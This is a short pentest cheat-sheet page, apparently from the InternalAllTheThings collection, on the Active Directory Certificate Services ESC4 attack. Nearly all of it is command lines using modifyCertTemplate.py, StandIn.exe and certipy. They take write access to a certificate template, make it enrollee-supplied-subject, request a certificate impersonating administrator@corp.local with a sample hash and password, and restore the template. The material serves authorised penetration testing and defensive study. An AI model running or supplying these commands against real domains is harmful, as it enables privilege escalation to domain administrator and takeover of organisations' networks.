ad-adcs-esc04.md (2142B)
1 --- 2 title: "Active Directory - Certificate ESC4" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc04.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc04.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC4 12 13 ## ESC4 - Access Control Vulnerabilities 14 15 > Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability 16 17 * Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) 18 19 ```ps1 20 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl 21 ``` 22 23 * Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 24 25 ```ps1 26 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag 27 28 # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. 29 C:\>StandIn.exe --adcs --filter WebServer --ess --add 30 ``` 31 32 * Perform ESC1 and then restore the value 33 34 ```ps1 35 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag 36 ``` 37 38 Using Certipy 39 40 ```ps1 41 # overwrite the configuration to make it vulnerable to ESC1 42 certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old 43 # request a certificate based on the ESC4 template, just like ESC1. 44 certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local' 45 # restore the old configuration 46 certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json 47 ``` 48 49 ## References 50 51 * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)